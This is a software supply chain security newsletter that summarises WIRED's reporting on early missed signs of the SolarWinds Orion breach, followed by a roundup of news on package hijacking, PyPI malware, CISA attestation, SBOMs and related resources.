Three Key Takeaways from WIRED’s SolarWinds Exposé

Welcome to the latest edition of Chainmail: Software Supply Chain Security News, which brings you the newest headlines from both the world and our team on all things software security. This week: Three key takeaways from WIRED’s exposé on the DOJ’s early detection of the SolarWinds Orion breach. Also: Researcher hijacks popular packages to get a job. 

This Week’s Top Story

Three Key Takeaways from WIRED’s SolarWinds Exposé

WIRED blew the SolarWinds supply chain hacking story open (again). Reporter Kim Zetter’s exposé was the product of months of interviews and research on the origins of the hack of SolarWinds Orion product. 

The Orion hack, which first came to light in the closing months of 2020, was the single biggest cybersecurity incident in recent memory. Hundreds of public- and private sector organizations were hacked after downloading a signed software update from SolarWinds containing a malicious backdoor. While much has been reported about the SolarWinds hack in the last two years, Zetter was able to expose a number of as-yet-unreported details of the months leading up to the revelation of the SolarWinds hack. Here are a few of the most important takeaways: 

• There were red flags - lots of them. Perhaps the most significant finding in Zetter’s reporting is that one of the most significant victims of the SolarWinds hack, the U.S. Department of Justice, had an early indication that it had been breached - some six months before the SolarWinds supply chain compromise was identified. DOJ security staff noticed suspicious traffic patterns emanating from a system running a test version of the Orion software in mid 2020. Zetter’s investigation uncovered communications between the DOJ and SolarWinds between May and July 2020 regarding the suspicious traffic. Those conversations led to the case being deemed insignificant by the DOJ. In August 2020, the DOJ purchased the Orion system, which sources say suggests that the DOJ was “satisfied” that there was no further threat posed by the Orion software. 
• Many other security firms also stumbled across the hack. The DOJ wasn’t alone. Zetter’s story recounts similar experiences by cybersecurity pros working for private firms that also found evidence of the SolarWinds compromise, but failed to connect the dots to the Orion software. One key source for her story is Steven Adair, the CEO of Volexity, who describes coming across evidence that Russian hackers had compromised the environment of a Washington D.C. think tank early in 2020. Despite numerous efforts to eject them, the hackers kept returning. Adair and his team zeroed in on one of the think tank’s servers—a machine running the SolarWinds Orion software - as their avenue onto the think tank’s network. They took the compromised server offline, but were never able to identify the method the actors used to compromise the system. 
• RTFM! Lax configuration played a part in the hack. The Sunburst malicious code only worked on systems that had Internet access. The recommended deployment guidelines said that the Orion servers should only have communicated with SolarWinds infrastructure. But in fact, around 20% to 30% of Orion deployments using the compromised version of the software were Internet connected. Victims had failed to do this, including Mandiant and Microsoft. The Department of Homeland Security and other government agencies didn’t even put them behind firewalls, Zetter reported, citing Chris Krebs, who at the time of the intrusions was in charge of CISA. Brown, SolarWinds’ security chief, notes that the hackers likely knew in advance whose servers were misconfigured. 

News Roundup

Here are the stories we’re paying attention to…

Researcher hijacks popular Packagist PHP packages to get a job

A researcher hijacked over a dozen Packagist packages—with some having been installed hundreds of millions of times over the course of their lifetime. The researcher with the pseudonym 'neskafe3v1' reached out to BleepingComputer stating that by hijacking these packages he hopes to get a job. And, he seems pretty confident that this would work. (BleepingComputer)

Unpaid open source maintainers struggle with increased security demands

Sixty percent of open source maintainers consider themselves to be unpaid hobbyists, according to a new study. With concerns about the security of the software supply chain paramount, this situation looks dangerous for organizations that depend on open source code.

The study by Tidelift, released Tuesday, showed that 77% of unpaid maintainers would like to be paid for their work. (The New Stack)

KEKW malware infects open-source Python Wheel files via a PyPI distribution

Malicious open-source Python .whl (Wheel) files were found distributing a new malware named KEKW that can steal sensitive information from infected systems by incorporating clipper activities with infostealers to hijack cryptocurrency transactions.

In a blog post on May 3, Cyble Research and Intelligence Labs (CRIL) explained that the Python packages under scrutiny were not present in the actual PyPI (Python Package Index) repository, indicating that the Python security team removed the malicious packages. (SC Media)

CISA releases draft self attestation form for comment (PDF)

This self-attestation form identifies the minimum secure software development requirements a software producer must meet, and attest to meeting, before their software subject to the requirements of M-22-18 may be used by Federal agencies. This form is used by software producers to attest that the software they produce was developed in conformity with specified secure software development practices. (CISA.gov)

GitGuardian’s Honeytoken aims to detect intruders in the software supply chain

If an attacker succeeds in gaining access to your code, Fourrier said, they can move laterally and take control of your databases in any of your cloud or other infrastructure resources. The goal of the Honeytoken module is to secure the software supply chain. “We have seen with different attacks [where an attacker] can hijack a production session from an engineer to get access to source code’’ from a third-party supply chain provider, Fourrier said. (SC Media)

eBook: Securing the government’s software supply chain

The government is grappling with the mechanics of addressing whether their software supply chain is secure. Download our new ebook to get a snapshot from leaders at CISA, the IT Industry Council and DoD’s National Counterintelligence and Security Center into current efforts. (Federal News Network)

Has the Altruism Model of Open Source Security Peaked?

OSS projects will always have a place in software. It’s a great learning environment for those just entering their coding career or to those who want to brush up on their skills or gain experience. But as the awareness around open source’s weaknesses broadens, will they shy away at trying to fix vulnerable or malicious code? It’s a question without a solid answer now, but it is likely that we hit the peak of what open source community was and are now shifting into a new era. (Security Boulevard)

Tightening Security in the Production Process by Shifting Left

Requiring developers also to be security experts who encountered the above challenges is, in most instances, an unrealistic expectation. An organization’s best option is to adopt tools and technologies that are secure by default and have security experts as part of the platform team who can understand the security structure and build guardrails and apply security best practices to that platform. (Spiceworks)

Anatomy of a Malicious Package Attack

As malicious packages are still relatively young, the techniques attackers rely on are likewise unsophisticated. Attackers using malicious packages tend to rely on four common techniques, including re- and post-install scripts, basic evasion techniques, shell commands, and basic network communication techniques. In the case of network communication, malicious packages use basic methods to deploy, execute, and communicate on the machine. That's good news for defenders, since even if the package is successfully downloaded, it remains relatively easy to detect while deployed. (Dark Reading)

What is a software bill of materials (SBOM)? And will it secure supply chains?

As a potential remedy, a tool called a software bill of materials (SBOM) has emerged as a key building block in software security and software supply-chain risk management. A SBOM is a nested inventory, a list of ingredients that make up software components. SBOM development has been in process since 2018 as a collaborative community effort, driven by National Telecommunications and Information Administration’s (NTIA) multistakeholder process. (SDXCentral.com)

Resource Roundup

Software Package Deconstruction: Analyzing the 3CX Software Package

In each episode of our new application security series, we will deconstruct, analyze, and expose hidden risks inside some of the largest and most complex software packages. In next week’s episode, we center in on the 3CX software package and recent supply chain attack.

Register now to watch on May 11

ReversingGlass: Supply Chain Risks in Art and Life… Even ‘The Simpsons’

In this episode of ReversingGlass: Key Concepts Explained, Matt touches on real-life software supply chain security cases such as the recent 3CX hack, and how popular media from past and present both imitates and forewarns this kind of threat.

ConversingLabs: The Rise of Malware Within the Software Supply Chain

In this special edition episode of our podcast, ConversingLabs, we chat with ReversingLabs Director of Product Management Charlie Jones on the sidelines of the RSA Conference 2023 in San Francisco. Charlie speaks with Paul about his RSAC track session: The Rise of Malware Within the Software Supply Chain.